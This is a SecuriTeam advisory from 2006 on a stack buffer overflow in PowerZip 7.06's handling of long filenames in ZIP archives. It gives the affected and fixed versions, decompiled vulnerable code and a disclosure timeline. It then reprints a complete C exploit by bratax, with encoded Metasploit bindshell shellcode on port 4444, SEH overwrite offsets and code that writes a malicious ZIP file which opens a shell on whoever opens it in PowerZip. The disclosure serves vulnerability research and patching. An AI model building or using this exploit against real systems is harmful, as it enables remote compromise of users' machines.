[NT] PowerZip Buffer Overflow and Exploit

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PowerZip Buffer Overflow and Exploit
------------------------------------------------------------------------


SUMMARY

A vulnerability has been found in  <http://www.powerzip.biz/> PowerZip. 
Exploited, the vulnerability allows execution of arbitrary code when the 
user opens a malicious ZIP archive.

In order to exploit this vulnerability successfully, the user must be 
convinced to open a malicious ZIP file.

DETAILS

Vulnerable Systems:
 * PowerZip version 7.06 Build 3895.

Immune Systems:
 * PowerZip version 7.07 Build 3901.

The stack-based buffer overflow occurs when PowerZip is processing an 
archive that contains a file with an overly long filename. It is possible 
to exploit the buffer overflow to execute arbitrary code on Windows 2000 
SP4 via a malicious ZIP file. On Windows XP SP2 systems, PowerZip will be 
terminated by the Data Execution Prevention (DEP) feature.

The buffer overflow occurs in a function that resembles the following in 
PowerZip.exe.

Vulnerable code:
func_50E1A0(arg_0, .., .., ..)
{
  ...
  CString nameOfCompressedFile;
  LVCOLUMN lvc;
  ...
  lvc.mask = LVCF_SUBITEM;
  SendMessage(hWnd, LVM_GETCOLUMN, arg_0->iCol, &lvc);
  ...
  if(arg_0->someFlag != 1)
  {
    switch(lvc.iSubItem)
    {
      case 0:
        if(arg_0->someStruct->someStruct2->someFlag != 0)
        {
          nameOfCompressedFile =
          arg_0->someStruct->someStruct2->compressedFilenameCString;
        }
        else
          ...
        break;
      case 1:
        CDTPath
        
var_180(arg_0->someStruct->someStruct2->CDTTimeVar.GetShortDate());
        ...
        ...
        break;
      case 2:
        break;
        ...
        ...
        ...
    }

    // This causes a stack-based buffer overflow when the name of a 
compressed
    // file (from a ZIP archive) is overly long.

    strcpy(arg_0->stackBuffer, nameOfCompressedFile->GetBuffer(0));

    nameOfCompressedFile->ReleaseBuffer(-1);
    ...
    ...
  }
  ...
  ...
}

Patch Availability:
 <http://www.powerzip.biz/download.aspx> Update to version 7.07 Build 
3901.

Disclosure Timeline:
 * 2006-08-10 - Vulnerability Discovered.
 * 2006-08-12 - Initial Vendor Notification.
 * 2006-08-12 - Initial Vendor Reply.
 * 2006-08-18 - Vendor Released Fixed Version.
 * 2006-08-23 - Public Release.

Exploit by bratax:
/*
PowerZip 7.06 Exploit by bratax (http://www.bratax.be/)

Just a quick one as I was able to reuse most of my zipcentral eploit 
code..
Greetz to everyone I like...(special greetz to mobbie and DT as they were 
sad
I didn't mention them the previous time :p)

******************************

Some technical info:
- Original advisory + vulnerability details are available here:
  http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP 
tho?)
- some code might look weird in this source.. (e.g. shellcode, 
offsets,...)
  this is because a lot of values are changed in memory.. so use your 
favorite
  debugger to see the real values and codes
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)
 !! sometimes it works, sometimes it doesn't... (throws exception E06D7363 
when
    it doesn't)... just try over and over and over..... and over.... and 
over...
    and over again till it works.. :p sometimes it works 10 times in a row 
and
    sometimes you have to try 10 times before it works 1 time.. I'm going 
to
    investigate this weekend why this is happening.. but now it's time to 
relax
    and drink some beers :)

*/

#include <stdio.h>
#include <string.h>

unsigned char scode[]=      //bindshell on p4444 (thx metasploit)
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58"
"\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38"
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37"
"\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41"
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36"
"\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";


char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
    "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x14\x08\x00";
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
    "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
    "\x01\x00\x24\x00\x00\x00\x00\x00\x00";
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
    "\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
    "\x32\x08\x00\x00\x00";

int main(int argc,char *argv[])
{
 char overflow[2064]; // exactly 2064....... wonder why?

FILE *vuln;
if(argc == 1)
{
    printf("PowerZip 7.06 Buffer Overflow Exploit.\n");
    printf("Coded by bratax (http://www.bratax.be/).\n");
    printf("Usage: %s <outputfile>\n",argv[0]);
    return 0;
}
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x32,sizeof(overflow)); //fill with crap
//memcpy(overflow+787, scode, 483);
memcpy(overflow+787, scode, 709);
memcpy(overflow+1620, "\x41\x49\x89\x04", 4); // jmp over pop pop ret
memcpy(overflow+1624, "\x02\x12\x01\x61", 4); // pop pop ret @ 0x61011202
memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5); // jmp back to shellcode


if(vuln)
{
    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
    fclose(vuln);
}
printf("File written.\nOpen with PowerZip 7.06 to exploit.\n");
return 0;
}


ADDITIONAL INFORMATION

The information has been provided by  <http://www.bratax.be/> bratax,  
<mailto:chewkeong@vuln.sg> Tan Chew Keong.

The original article(s) can be found at:
 <http://vuln.sg/powerzip706-en.html> http://vuln.sg/powerzip706-en.html,
 <http://www.milw0rm.com/exploits/2286> 
http://www.milw0rm.com/exploits/2286



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.